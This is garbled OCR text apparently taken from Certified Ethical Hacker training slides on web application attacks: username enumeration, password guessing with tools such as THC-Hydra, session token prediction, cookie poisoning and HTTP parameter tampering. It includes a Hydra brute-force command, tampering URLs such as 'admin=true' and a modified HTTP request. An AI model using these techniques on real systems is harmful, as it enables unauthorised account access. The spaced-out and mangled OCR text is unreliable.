m e c h a n i s m a t t a c k in v o lv e s i d e n t i f y i n g a n d e x p l o i t i n g t h e u s e r n a m e a nd p a s s w o r d s .
U s e r N a m e E n u m e ra tio n
U ser n a m e s can be e n u m e r a t e d in t w o w a y s ; o n e is v e r b o s e f a i l u r e m e s s a g e s a n d t h e
o t h e r is p r e d i c t a b l e u s e r n a m e s .
V e rb o s e F a ilu re M e s s a g e
— ' In a t y p ic a l lo g in s y s te m , t h e u s e r is r e q u i r e d t o e n t e r t w o p ie ces o f i n f o r m a t i o n , t h a t
is, u s e r n a m e a n d p a s s w o r d . In s o m e cases, an a p p li c a t i o n w ill ask f o r s o m e m o r e
i n f o r m a t i o n . If t h e u s e r is t r y i n g t o log in a n d fa ils, t h e n it can be in f e r r e d t h a t a t le a s t o n e o f
t h e p ie ce s o f t h e i n f o r m a t i o n t h a t is p r o v id e d by t h e u s e r is i n c o r r e c t o r i n c o n s i s t e n t w i t h th e
o t h e r i n f o r m a t i o n p r o v id e d by t h e user. T h e a p p li c a t i o n d is clo ses t h a t p a r t i c u l a r i n f o r m a t i o n
t h a t is p r o v id e d by t h e u s e r w a s i n c o r r e c t o r in c o n s is t e n t ; it w ill be p r o v id i n g g r o u n d f o r an
a t t a c k e r t o e x p l o i t t h e a p p li c a t i o n .

Ethical Hacking a n d C o u n te rm e a s u re s Exam 3 1 2 -5 0 C ertified Ethical H acker
UserNameEnumeration CEH UrtifWd ItliK4I lUilwt
I f lo g in e rro r s ta te s w h ic h p a rt o f th e u s e r n a m e a n d p a s s w o rd is n o t c o rre c t, g u e s s
th e u s e rs o f th e a p p lic a tio n u s in g t h e tr ia l- a n d - e r r o r m e th o d
N o te : U s e r n a m e e n u m e ra tio n fr o m v e rb o s e e r r o r m essages w ill fa il if th e a p p lic a tio n im p le m e n ts a c c o u n t lo c k o u t p o lic y

i.e ., lo c k s a c c o u n t a f te r a c e r ta in n u m b e r o f fa ile d lo g in a tte m p ts
U s e r N a m e E n u m e r a tio n
S o u rc e : h ttp s ://w o r d p r e s s .c o m
U se r n a m e e n u m e r a tio n h e lp s in g u e s s in g lo g in IDs a nd p a s s w o rd s o f u sers. If th e lo g in e r r o r

s ta te s w h ic h p a r t o f th e u s e r n a m e a n d p a s s w o rd a re n o t c o rr e c t, guess th e u sers o f th e
a p p lic a tio n u s in g th e t r ia l- a n d - e r r o r m e th o d .
L o o k a t th e fo llo w in g p ic tu r e t h a t s h o w s e n u m e r a tin g u s e r n a m e s fr o m v e rb o s e fa ilu r e

m essa ge s:

Password Attacks: Password

F u n c tio n a lity Exploits CEH
D e te rm in e p a s s w o rd c han ge f u n c tio n a lity w ith in th e
a p p lic a tio n by s p id e rin g th e a p p lic a tio n o r c re a tin g a lo g in
account
Try ra n d o m s trin g s f o r 'O ld P a ssw ord', 'N e w P assw ord', and

'C o n firm th e N e w P a s s w o rd ' fie ld s a n d a n a ly z e e rro rs to
id e n t if y v u ln e r a b ilitie s in p a s s w o rd c han ge f u n c tio n a lity
'F o rg o t P a s s w o rd ' fe a tu re s g e n e ra lly p re s e n t a ch a lle n g e t o

th e user; if th e n u m b e r o f a tte m p ts is n o t lim ite d , a tta c k e r
can g ue ss t h e c h a lle n g e a n s w e r s u c c e s s fu lly w ith th e h e lp o f
s o c ia l e n g in e e rin g
A p p lic a tio n s m a y a lso se n d a u n iq u e r e c o v e ry URL o r e x is tin g

p a s s w o rd t o an e m a il a dd ress s p e c ifie d by th e a tta c k e r if th e
c h a lle n g e is s o lv e d
"R e m e m b e r M e " fu n c tio n s a re im p le m e n te d using a s im p le

p e rs is te n t c o o k ie , such as R e m e m b e rU s e r= ja s o n o r a
p e rs is te n t session id e n tifie r such as
R e m e m b e rU s e r= A B Y 1 1 2 0 1 0
A tta c k e rs c a n use an e n u m e ra te d u s e r n a m e o r p re d ic t th e
session id e n tifie r t o b y p a s s a u th e n tic a tio n m e c h a n is m s
P a s s w o rd A tta c k s : P a s s w o rd F u n c tio n a lity E x p lo its
P a ssw o rd a tta c k s a re th e te c h n iq u e s used b y th e a tta c k e r fo r d is c o v e rin g p a s s w o rd s .

A tta c k e rs e x p lo it th e p a s s w o rd f u n c t io n a lit y so t h a t th e y can b ypa ss th e a u th e n tic a tio n
m e c h a n is m .
P a s s w o r d C h a n g in g
D e te rm in e p a s s w o rd c h a n g e f u n c t io n a lit y w ith in th e a p p lic a tio n b y s p id e rin g th e

a p p lic a tio n o r c re a tin g a lo g in a c c o u n t. T ry ra n d o m s trin g s f o r O ld P a s s w o rd , N e w
P a s s w o rd , a n d C o n firm th e N e w P a ss w o rd fie ld s a n d a n a ly z e e rro rs to id e n tify v u ln e r a b ilitie s in
p a s s w o rd c h a n g e fu n c tio n a lity .
P a s s w o rd R e c o v e ry
^ ‫י‬- — F o rg o t P a ssw o rd fe a tu r e s g e n e ra lly p re s e n t a c h a lle n g e t o th e u s e r; if th e n u m b e r o f

a tte m p ts is n o t lim ite d , a tta c k e rs can guess th e c h a lle n g e a n s w e r s u c c e s s fu lly w ith th e h e lp o f
s o cia l e n g in e e rin g . A p p lic a tio n s m a y a lso s e n d a u n iq u e r e c o v e ry URL o r e x is tin g p a s s w o rd to
an e m a il a d d re s s s p e c ifie d b y th e a tta c k e r if th e c h a lle n g e is s o lv e d .
R e m e m b e r M e E x p lo it
R e m e m b e r M e fu n c tio n s a re im p le m e n te d u s in g a s im p le p e r s is te n t c o o k ie , su ch as
R e m e m b e rU s e r= ja s o n o r a p e r s is te n t se ssio n id e n t if ie r such as R e m e m b e rU s e r= A B Y 1 1 2 0 1 0 .
M o d u le 13 P ag e 1 8 6 0 Ethical H acking a n d C o u n te rm e a s u re s C opyright © by EC-C0UnCil

Password Attacks: Password

G uessing
CEH
Password
L ist
A tta ckers cre a te a lis t o f possible
re Password
D ictionary
A tta c k e rs c a n c re a te a d ic tio n a ry P a ssw ord guessing c a n be
Tools
passw ords using m o s t c o m m o n ly o f a ll possible p a s s w o rd s using p e rfo rm e d m a n u a lly o r using

used passw ords, fo o tp rin tin g ta rg e t to o ls such as D ic tio n a r y M a k e r a u to m a te d to o ls such as B ru tu s ,
and social e ng in e e rin g te c h n iq u e s ,
t o p e r fo rm d ic tio n a r y a tta c k s T H C -H y d ra ,e tc .
and t r y each passw ord u n til th e
c o rre c t passw ord is d iscovered
% !0 u it *lout
T arget Pa3swcrdc | T uning | Cpeciffc | Gtart j T a 1g«l P a ssw crts |T un.ng |0 p e c ific Gtart |
Usernam e O u to jt
H ydra v4 * (c) 5 0 0 4 by v a n M a u s e r /T H C • u s e allo‫׳‬A/Pd only for legal p u r p o s e s
( • Usernam e test!
H y d ‫׳‬a (tv to . •vw.ua Ihc erg) sta rlin g at 2 004-05-17 5 1 :58:52
C Usom am o Lict [D A ' AJ 3 2 ta s k s . 1 se rv e rs , 4 5 3 8 0 login trie s (l:1/p:45380). ~ 1418 trie s p e r ta s k
[ d a t a ] a r a c k n g s e rv ic e ftp on port 21
(STATUS] 14055.00Ules/min. 14050IrlesIn00:01h. 31324lexfoIn00:031)
C Password [STATUS] 14513.00ifles/min. 29020triesIn00:0211. 15354tcxioIn00.0211
[2 ‫[] ו‬Tip] h o s t: 127.0.0.1 lo g in : m a rc p a s s w o r d : s u c c e s s
<* Passv/ora List Hyda(Mp.//*#swlhcerg)finisheda! 2004-05-1722:01:38
< r1 n lsh e d >
C olo r separated rile
r L e o Colon 6eporatod filo
P" Try login a s p a ssw o rd [7 T ry em pty pa ssw ac; Gave Output I
hydra 127.0.0.1 ftp -I te s tus e r -P /tm p/pa3slist.1xt -e ns
- ■ P a s s w o rd A tta c k s : P a s s w o rd G u e s s in g
J1=S
- P a ssw o rd g u e s s in g is a m e th o d w h e re an a tta c k e r g u e sses v a rio u s p a s s w o rd s u n til he
o r she g e ts th e c o rr e c t p a s s w o rd s b y u s in g th e fo llo w in g m e th o d s : p a s s w o rd lis t, p a s s w o rd
d ic tio n a r y , a n d v a rio u s to o ls .
A tta c k e rs c re a te a lis t o f p o s s ib le p a s s w o rd s u s in g m o s t c o m m o n ly used p a s s w o rd s ,

fo o t p r in t in g ta r g e t a n d s o cia l e n g in e e rin g te c h n iq u e s , a n d tr y in g e ach p a s s w o rd u n til th e
c o r r e c t p a s s w o rd is d is c o v e re d .
P a s s w o rd D ic tio n a r y
m A tta c k e rs can c re a te a d ic tio n a r y o f all p o s s ib le p a s s w o rd s u s in g to o ls su ch as

D ic tio n a r y M a k e r to p e r fo r m d ic tio n a r y a tta c k s .
T o o ls U s e d f o r P a s s w o r d G u e s s in g
P a ssw o rd g u e s s in g can be p e r fo r m e d m a n u a lly o r u s in g a u to m a te d to o ls su ch as

W e b C ra c k e r, B ru tu s , B u rp In s id e r, T H C -H y d ra , e tc .
T H C -H y d ra
S o u rc e : h t t p : / / w w w . t h c . o r g

Ethical Hacking a n d C o u n te rm e a s u re s Exam 3 1 2-50 C ertified Ethical H acker
Password Attacks: B ru te-fo rcin g I CEH
C o p y r ig h t © by E&Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
P a s s w o rd A tta c k s : B ru te F o r c in g
wcav 1 1 B r u t e f o r c e is o n e o f t h e m e t h o d s u s e d f o r c r a c k i n g p a s s w o r d s . In a b r u t e f o r c i n g
a t t a c k , a t t a c k e r s c r a c k t h e l o g in p a s s w o r d s b y t r y i n g all p o s s i b l e v a l u e s f r o m a s e t o f a l p h a b e t ,
n u m e ric , and s p e cia l c h a ra cte rs. T he m a in lim ita tio n o f th e b ru te fo rc e a tta c k is t h i s is
b e n e f i c i a l in i d e n t i f y i n g s m a l l p a s s w o r d s o f t w o c h a r a c t e r s . G u e s s i n g b e c o m e s m o r e c r u c i a l
w h e n t h e p a s s w o r d l e n g t h is l o n g e r a n d a ls o i f i t c o n t a i n s l e t t e r s w i t h b o t h u p p e r a n d l o w e r
c a s e . If n u m b e r s a n d s y m b o l s a r e u s e d , t h e n i t m i g h t e v e n t a k e m o r e t h a n a f e w y e a r s t o g u e s s
t h e p a s s w o r d , w h i c h is a l m o s t p r a c t i c a l l y i m p o s s i b l e . C o m m o n l y u s e d p a s s w o r d c r a c k i n g t o o l s
b y a t t a c k e r s i n c l u d e B u r p S u it e 's I n t r u d e r , B r u t u s , S e n s e p o s t ' s C r o w b a r , e tc .
B u rp S u it e 's I n t r u d e r
• > S ource: h t t p : / / p o r t s w ig g e r . n e t
B u r p I n t r u d e r is a m o d u l e o f B u r p S u i t e . It e n a b l e s t h e u s e r t o a u t o m a t i z e p e n t e s t i n g o n w e b
a p p lic a tio n s .

C o p y r ig h t © b y EC-Couactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
S e s s io n A tta c k s : S e s s io n ID P r e d ic tio n /B r u te F o r c in g
E ve ry tim e a u s e r logs in t o a p a r tic u la r w e b s ite , th e n a se ssio n ID is g iv e n t o th e u ser.

T h is se ssio n ID is v a lid u n til th e se ssio n is te r m in a te d a n d a n e w s e ssio n ID is p ro v id e d w h e n th e
u s e r logs in a g a in . A tta c k e rs t r y t o e x p lo it th is s e s s io n ID m e c h a n is m b y g u e s s in g th e n e x t
se ssio n ID a fte r c o lle c tin g s o m e v a lid se ssio n IDs.
0 In th e f ir s t s te p , th e a tta c k e r c o lle c ts s o m e v a lid se ssio n ID v a lu e s b y s n iffin g t r a f f ic fr o m

a u th e n tic a te d u sers.
© A tta c k e rs th e n a n a ly z e c a p tu re d se ssio n IDs t o d e te r m in e th e s e ssio n ID g e n e r a tio n

p ro c e s s su ch as th e s tr u c tu r e o f se ssio n ID, th e in fo r m a tio n t h a t is used t o c re a te it, a nd
th e e n c r y p tio n o r hash a lg o r ith m u sed b y th e a p p lic a tio n to p r o te c t it.
© In a d d itio n , th e a tta c k e r can im p le m e n t a b ru te fo rc e te c h n iq u e t o g e n e ra te a n d te s t

d if fe r e n t v a lu e s o f th e se ssio n ID u n til h e o r she s u c c e s s fu lly g e ts access to th e
a p p lic a tio n .

C ookie E xploitation: C ookie

Poisoning
I f t h e c o o k ie c o n ta in s p a s s w o r d s o r s e s s io n id e n t if ie r s , a tta c k e rs c a n s te a l t h e c o o k ie u s in g
te c h n iq u e s s u c h as s c r ip t in je c t io n a n d e a v e s d r o p p in g
A tta c k e rs t h e n r e p la y t h e c o o k ie w it h t h e s a m e o r a lte r e d p a s s w o r d s o r s e s s io n id e n tifie r s t o

b y p a s s w e b a p p lic a tio n a u t h e n t ic a t io n
A tta c k e rs c a n t r a p c o o k ie s u s in g to o ls s u c h as O W A S P Z e d A t t a c k P ro x y , B u rp S u ite , e tc .
Untifled Session - OWASP ZAP

£ile Edit View Analyse Report Tools Hole
dFj ®‫־‬13© ‫ ״‬Q1? 1, <
2>
| Requests j Response— Brga«.Xj
— '■J M J U j U B i
itt_____ *
H i - * " 1*1 C
.: ‫_ ו ו‬M c x ilW S .C IS ia dc ‫י‬.* t t € .2 ; EHK«4t A ppl«V eb K it/537.4 (KETKL it—19: 1
_
I l k • Scckol Cfcr0K */2 2 . 0 . 12 2 » .9 4 S«C«X1 /5 3 7 .4
C ach e-C onti0 1 : oax-aoe=0
A ccep t! • / •
Rererer: ntcr://in.yonoc.oca»/?p^;3
A ee ep t-E n c cd in g : a deft
A c c ep t-L a n ^ u iq v : c n -U S ,« n ;q ^ > .9
A c c v p t-C h a sa v t: X SO -S559-1.at£-S ;<f-C . 7 , • j q - 0 .3
C oo k l•: a<Uld015S24S9e12Sar4e: « j spioer j*f* .
Current Scans 0
URI found during aa*M
URi found bui oul of aart

scope
Alerts r»00 •‫״‬-‫ ־‬p o f »0 h ttp s ://w w w .o w a s p .o rg cunwscaM_* 0 * 0 0 wo
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n Is S t r i c t l y P r o h ib it e d
C o o k ie E x p lo ita tio n : C o o k ie P o is o n in g
C o o kie s fr e q u e n tly tr a n s m it s e n s itiv e c re d e n tia ls a n d can be m o d ifie d w ith ease to

e s c a la te access o r a ssu m e th e id e n t it y o f a n o th e r u s e r.
C o o k ie s a re used t o m a in ta in a se ssio n s ta te in th e o th e rw is e s ta te le s s HTTP p ro to c o l. Sessions

a re in te n d e d to be u n iq u e ly tie d t o th e in d iv id u a l a c c e s s in g th e w e b a p p lic a tio n . P o is o n in g o f
c o o k ie s a n d se ssio n in f o r m a tio n can a llo w an a tta c k e r to in je c t m a lic io u s c o n te n t o r o th e rw is e
m o d ify th e u s e r's o n lin e e x p e rie n c e a n d o b ta in u n a u th o riz e d in fo r m a tio n .
C o o kie s can c o n ta in s e s s io n -s p e c ific d a ta su ch as u s e r IDs, p a s s w o rd s , a c c o u n t n u m b e rs , lin k s

to s h o p p in g c a rt c o n te n ts , s u p p lie d p r iv a te in fo r m a tio n , a n d se ssio n IDs. C o o k ie s e x is t as file s
s to re d in th e c lie n t c o m p u te r 's m e m o r y o r h a rd d isk. By m o d ify in g th e d a ta in th e c o o k ie , an
a tta c k e r can o fte n g a in e s c a la te d access o r m a lic io u s ly a ffe c t th e u s e r's s e s s io n . M a n y s ite s
o ffe r th e a b ility t o "R e m e m b e r m e ? " a n d s to re th e u s e r's in fo r m a tio n in a c o o k ie , so he o r she
d o e s n o t h a ve t o r e - e n te r th e d a ta w ith e v e ry v is it t o th e s ite . A n y p riv a te in fo r m a tio n e n te re d
is s to re d in a c o o k ie . In an a tt e m p t t o p r o te c t c o o k ie s , s ite d e v e lo p e rs o fte n e n c o d e th e
c o o k ie s . E asily re v e rs ib le e n c o d in g m e th o d s su ch as B ase64 a nd ROT13 ( r o ta tin g th e le tte r s o f
th e a lp h a b e t 13 c h a ra c te rs ) g iv e m a n y w h o v ie w c o o k ie s a fa ls e sense o f s e c u rity . If th e c o o k ie
c o n ta in s p a s s w o rd s o r se ssio n id e n tifie r s , a tta c k e rs can s te a l th e c o o k ie u s in g te c h n iq u e s such
as s c r ip t in je c tio n a n d e a v e s d ro p p in g . A tta c k e rs th e n re p la y th e c o o k ie w ith th e s a m e o r a lte re d


Mechanism Mechanism
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p H a c k in g M e t h o d o lo g y
‫־‬- 1‫— י‬ A u th o r iz a tio n p ro te c ts th e w e b a p p lic a tio n s b y g iv in g a u th o r ity t o c e rta in u sers fo r

a cce ssin g th e a p p lic a tio n s and r e s tr ic tin g c e rta in u sers fr o m a c c e s s in g su ch a p p lic a tio n s .
A tta c k e rs b y m e a n s o f a u th o r iz a tio n a tta c k s t r y to g a in access to th e in f o r m a tio n re s o u rc e s
w it h o u t p ro p e r c re d e n tia ls . T h e w a y s to a tta c k a u th o r iz a t io n s c h e m e s a re e x p la in e d o n th e
fo llo w in g slid e s.

AuthorizationAttack CEH
C«rt1fW4 itfciul Nm Im
■ A tta c k e rs m a n ip u la t e t h e HTTP r e q u e s ts t o s u b v e r t t h e a p p lic a tio n a u t h o r iz a tio n s c h e m e s b y m o d if y in g in p u t

f ie ld s t h a t r e la te t o u s e r ID , u s e r n a m e , acc e s s g r o u p , c o s t, file n a m e s , f ile id e n tifie r s , e tc .
^ A tta c k e rs f i r s t access w e b a p p lic a tio n u s in g lo w p r iv ile g e d a c c o u n t a n d th e n e s c a la te p r iv ile g e s t o a c c e s s

p r o te c te d re s o u rc e s
Q u e ry S t r in g H id d e n Tags
A u th o r iz a tio n A tta c k
In an a u th o r iz a tio n a tta c k , th e a tta c k e r f ir s t fin d s th e lo w e s t p riv ile g e d a c c o u n t a nd

th e n logs in as an a u th e n tic u s e r a n d s lo w ly e s c a la te s p riv ile g e s to access p ro te c te d re s o u rc e s .
A tta c k e rs m a n ip u la te th e HTTP re q u e s ts to s u b v e rt th e a p p lic a tio n a u th o r iz a t io n s c h e m e s b y
m o d ify in g in p u t fie ld s t h a t re la te to u s e r ID, u s e r n a m e , access g ro u p , c o s t, file n a m e s , file
id e n tifie r s , e tc .
T h e s o u rc e s t h a t a re used b y th e a tta c k e rs in o r d e r t o p e r fo r m a u th o r iz a tio n a tta c k s in c lu d e

u n ifo r m re s o u rc e id e n tifie r , p a r a m e te r ta m p e r in g , POST d a ta , HTTP h e a d e rs , q u e ry s trin g ,
c o o k ie s , a n d h id d e n ta gs.
P a r a m e te r T a m p e r in g
P a ra m e te r ta m p e r in g is an a tta c k t h a t is b ased o n th e m a n ip u la tio n o f p a ra m e te rs

t h a t a re e x c h a n g e d b e tw e e n s e rv e r a n d c lie n t in o r d e r t o m o d ify th e a p p lic a tio n d a ta ,
su ch as p ric e a n d q u a n tity o f p ro d u c ts , p e rm is s io n s a n d u s e r c re d e n tia ls , e tc . T h is in fo r m a tio n
is u s u a lly s to re d in c o o k ie s , URL q u e ry s trin g s , o r h id d e n fo r m fie ld s , a nd t h a t is u sed to
in c re a s e in c o n tr o l a n d a p p lic a tio n fu n c tio n a lity .
lE P P o s tD a ta
P ost d a ta o fte n is c o m p ris e d o f a u th o r iz a tio n a n d se ssio n in fo r m a tio n , sin c e in m o s t
o f th e a p p lic a tio n s , th e in fo r m a tio n t h a t is p ro v id e d b y th e c lie n t m u s t be a s s o c ia te d

H T T P R e q u e s t T a m p e r in g CEH
Q u e ry S trin g T a m p e rin g
J I f t h e q u e r y s tr in g is v is ib le in t h e a d d re s s b a r o n t h e b r o w s e r, t h e a tta c k e r c a n e a s ily c h a n g e t h e
s tr in g p a r a m e te r t o b y p a s s a u t h o r iz a t io n m e c h a n is m s
h t t p : //w w w . ju g g y b o y .c o m /m a il. a s p x ? m a ilb o x = jo h n & c o m p a n y = a c m e % 20 c o n 1
h t t p s : / / ju g g y s h o p . c o m /b o o k s /d o w n lo a d /8 5 2 7 4 1 3 6 9 . p d f
h t t p s : / / ju g g y b a n k . c o m /lo g in / h o m e . js p ? a d m in = t r u e
J A tta c k e rs c a n u s e w e b s p id e r in g to o ls s u c h as B u r p S u ite t o s c a n t h e w e b a p p f o r PO ST p a r a m e te rs
H TTP H e a d e rs
J I f t h e a p p lic a tio n u se s t h e R e fe r e r h e a d e r f o r m a k in g acc e s s c o n t r o l d e c is io n s , a tta c k e rs c a n m o d if y it
t o acc e s s p r o t e c t e d a p p lic a t io n f u n c t i o n a l it ie s
GET http://juggyboy:8180/Applications/Download?ItemID =»201 HTTP/1.1

Host: janaina:8180
User-Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.04
Accept: text/xml, application/xml, application/xhtml+xml,text/htmtl;g-0.9,text/plain;g=0.8,image/png,*/*‫׳‬g=0.5
Proxy-Connection: keep-alive
Referer: http: // juggyboy:8180/Applications/Download?Admin = False
lte m lD = 201 is n o t accessible as A d m in p a ra m e te r is set t o false, a ttacke r can change it t o tru e and access p ro te c te d item s
C o p y r ig h t © by EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
H T T P R e q u e s t T a m p e r in g
A tta c k e rs ta m p e r w ith th e HTTP re q u e s t w it h o u t u s in g a n o th e r u s e r's ID. T h e a tta c k e r

c h a n g e s th e re q u e s t in b e tw e e n b e fo re th e m essa ge is re c e iv e d b y th e in te n d e d re c e iv e r.
Q u e r y S tr in g T a m p e r in g
A n a tta c k e r ta m p e r s w ith th e q u e ry s tr in g w h e n th e w e b a p p lic a tio n s use q u e ry

s trin g s to pass o n th e m essa g e s b e tw e e n pages. If th e q u e ry s tr in g is v is ib le in th e
a d d re s s b a r o n th e b ro w s e r, th e a tta c k e r can e a s ily c h a n g e th e s trin g p a r a m e te r t o b ypa ss
a u th o r iz a tio n m e c h a n is m s .
F IG U R E 1 3 .4 6 : Q u e ry S t r in g T a m p e r in g
A tta c k e rs can use w e b s p id e rin g to o ls su ch as B u rp S u ite to scan th e w e b a p p f o r POST

p a ra m e te rs .
H T T P H e a d e rs
If th e a p p lic a tio n uses th e R e fe rre r h e a d e r f o r m a k in g access c o n tr o l d e c is io n s ,

I n t h e f ir s t s te p , t h e a tta c k e r c o lle c ts s o m e c o o k ie s s e t b y t h e w e b a p p lic a tio n a n d a n a ly z e s

th e m t o d e t e r m in e t h e c o o k ie g e n e r a t io n m e c h a n is m
T h e a tta c k e r th e n tr a p s c o o k ie s s e t b y t h e w e b a p p lic a tio n , t a m p e r s w it h its p a r a m e te rs

u s in g to o ls , s u c h as O W A S P Z e d A t t a c k P r o x y , a n d r e p la y t o t h e a p p lic a tio n
h ttp s ://w w w .o w a s p .o rg
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
i ‫ן‬ A u th o r iz a tio n A tta c k : C o o k ie P a r a m e te r T a m p e r in g
y ./. C o o k ie p a r a m e te r ta m p e r in g is a m e th o d u sed t o ta m p e r w ith th e c o o k ie s s e t b y th e

w e b a p p lic a tio n in o r d e r to p e r fo r m m a lic io u s a tta c k s .
© In th e f ir s t s te p , th e a tta c k e r c o lle c ts s o m e c o o k ie s s e t b y th e w e b a p p lic a tio n a nd

a n a lyze s th e m to d e te r m in e th e c o o k ie g e n e r a tio n m e c h a n is m .
© T h e a tta c k e r th e n tra p s c o o k ie s s e t b y th e w e b a p p lic a tio n , ta m p e r s w ith its p a ra m e te rs

u s in g to o ls such as P aros P ro xy , a n d re p la y s to th e a p p lic a tio n .
S o u rc e : h ttp s ://w w w .o w a s p .o r g


Mechanism Mechanism
A tta c k S e s s io n M a n a g e m e n t M e c h a n is m
T h e se ssio n m a n a g e m e n t m e c h a n is m is th e k e y s e c u r ity c o m p o n e n t in m o s t w e b a p p lic a tio n s .

S ince it p la y s a ke y ro le , it has b e c o m e a p rim e ta r g e t f o r la u n c h in g m a lic io u s a tta c k s a g a in s t
a p p lic a tio n se ssio n m a n a g e m e n t. A n a tta c k e r b re a k in g th e a p p lic a tio n se ssio n m a n a g e m e n t
can e a s ily b yp a ss th e r o b u s t a u th e n tic a tio n c o n tr o ls a nd m a s q u e ra d e as a n o th e r a p p lic a tio n
u s e r w it h o u t k n o w in g t h e ir c re d e n tia ls (u s e r n a m e , p a s s w o rd s ). T h e a tta c k e r can e v e n ta k e th e
e n tir e a p p lic a tio n u n d e r his o r h e r c o n tr o l if he o r she c o m p ro m is e s an a d m in is tr a tiv e u s e r in
th is w a y . T h e d e ta ils a b o u t th e a tta c k s e s s io n m a n a g e m e n t m e c h a n is m a re d e s c rib e d in d e ta il
o n th e fo llo w in g slid e s.

S e s s io n M a n a g e m e n t A t t a c k
S e s s io n M a n a g e m e n t A tta c k
A se ssio n m a n a g e m e n t a tta c k is o n e o f th e m e th o d s used b y a tta c k e rs to c o m p ro m is e

a n e tw o r k . A tta c k e rs b re a k an a p p lic a tio n 's se ssio n m a n a g e m e n t m e c h a n is m to b yp a ss th e
a u th e n tic a tio n c o n tr o ls a n d im p e r s o n a te a p riv ile g e d a p p lic a tio n u s e r. A se ssio n m a n a g e m e n t
a tta c k in v o lv e s t w o sta g e s; o n e is s e s s io n to k e n g e n e r a tio n a n d th e o th e r is e x p lo itin g session
to k e n s h a n d lin g .
In o r d e r t o g e n e ra te a v a lid se ssio n to k e n , th e a tta c k e r p e rfo rm s :
0 S ession T o k e n s P re d ic tio n
© S ession T o k e n s T a m p e rin g
O n ce th e a tta c k e r g e n e ra te s th e v a lid se ssio n to k e n , th e a tta c k e r tr ie s to e x p lo it th e se ssio n

to k e n h a n d lin g in th e fo llo w in g w a y s :
0 S ession H ija c k in g
© S ession R e p la y
Q M a n -ln -T h e - M id d le A tta c k

Attacking Session Token

Generation M echanism EH
W e a k E n c o d in g E x a m p le
h t t p s : //w w w . ju g g y b o y . c o m /c h e c k o u t?
S e s s io n T o k e n = % 7 5 % 7 3 % 6 5 % 7 2 % 3 D % 6 A % 6 1 % 7 3 % 6 F % 6 E % 3 B % 6 1 % 7 0 % 7 0 % 3 D % 6 1 % 6 4 % 6 D % 6 9 % 6 E % 3 B % 6
4 % 6 1 % 7 4 % 6 5 % 3 D % 3 2 % 3 3 % 2 F % 3 1 % 3 1 % 2 F % 3 2 % 3 0 % 3 1 % 3 0
W h e n h e x - e n c o d in g o f an AS C II s tr in g user=jason;app=admin;date=23/ll/201
s e s s io n to k e n b y ju s t c h a n g in g d a te a n d u s e it f o r a n o th e r tr a n s a c tio n w it h s e r v e r
S e s s io n T o k e n P r e d ic t io n
A tta c k e rs o b t a in v a lid s e s s io n to k e n s b y s n if f in g th e tr a ffic o r le g itim a te ly lo g g in g in to a p p lic a tio n a n d
a n a ly z in g it f o r e n c o d in g ( h e x - e n c o d in g , B a s e 6 4 ) o r a n y p a tte rn
If a n y m e a n in g ca n b e re v e rs e e n g in e e r e d fro m th e s a m p le o f s e s s io n to k e n s , a tta c k e rs a tte m p t to
g u e s s th e to k e n s r e c e n tly is s u e d to o t h e r a p p lic a tio n u s e rs
A tta c k e rs th e n m a k e a la r g e n u m b e r o f re q u e s ts w ith th e p r e d ic te d to k e n s to a s e s s io n - d e p e n d e n t
p a g e to d e te r m in e a v a lid s e s s io n to k e n
C o p y r ig h t © b y E&CsiMCtl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
A tta c k in g S e s s io n T o k e n G e n e r a tio n M e c h a n is m
A tta c k e rs s te a l v a lid se ssio n to k e n s a n d th e n p r e d ic t th e n e x t s e ssio n to k e n a fte r

o b ta in in g th e v a lid se ssio n to k e n s .
W e a k E n c o d in g E x a m p le
G
h t t p s : / / w w w . ju g g y b o y . c o m / c h e c k o u t ?
SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%
64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30
W h e n h e x -e n c o d in g o f an ASCII s tr in g u s e r = j a s o n ; a p p = a d m i n ; d a t e = 2 3 / l l / 2 0 l 0 , th e a tta c k e r
can p re d ic t a n o th e r se ssio n to k e n b y ju s t c h a n g in g th e d a te a n d u s in g it f o r a n o th e r tr a n s a c tio n
w ith th e s e rv e r.
S e s s io n T o k e n P r e d ic t io n
A tta c k e rs o b ta in v a lid se ssio n to k e n s b y s n iffin g th e t r a f f ic or le g itim a te ly lo g g in g in to

a p p lic a tio n a n d a n a ly z in g it f o r e n c o d in g (h e x -e n c o d in g , B ase64) o r a n y p a tte r n . If a n y m e a n in g
can be re v e rs e e n g in e e re d fr o m th e s a m p le o f se ssio n to k e n s , a tta c k e rs a tt e m p t to guess th e

A tta c k in g S e s s io n T o k e n s
M e c h a n is m : S e s s io n T o k e n
H a n d lin g
S n iffin g
r
JL
c
^ !7
u
■ A tta c k e rs s n iff th e a p p lic a tio n t r a f fic using a s n iffin g t o o l such as W ire s h a rk o r a n in te rc e p tin g p ro x y such as B u rp . If
HTTP c o o k ie s a re bein g used as th e tra n s m is s io n m e c h a n is m f o r session to k e n s a n d th e s e cure fla g is n o t se t, a tta c k e rs
c a n re p la y t h e c o o k ie t o ga in u n a u th o riz e d access t o a p p lic a tio n
■ A tta c k e r c a n use session c o o k ie s t o p e r fo rm session h ija c k in g , session re p la y , a n d M a n - in - th e -M id d le a tta c k s
A tta c k in g S e s s io n T o k e n s H a n d lin g M e c h a n is m :
S e s s io n T o k e n S n iffin g
A tta c k e rs f ir s t s n iff th e n e tw o r k t r a f f ic f o r v a lid se ssio n to k e n s a n d th e n p re d ic t th e n e x t session

to k e n b ased o n th e s n iffe d se ssio n to k e n . T h e a tta c k e r uses th e p re d ic te d se ssio n ID to
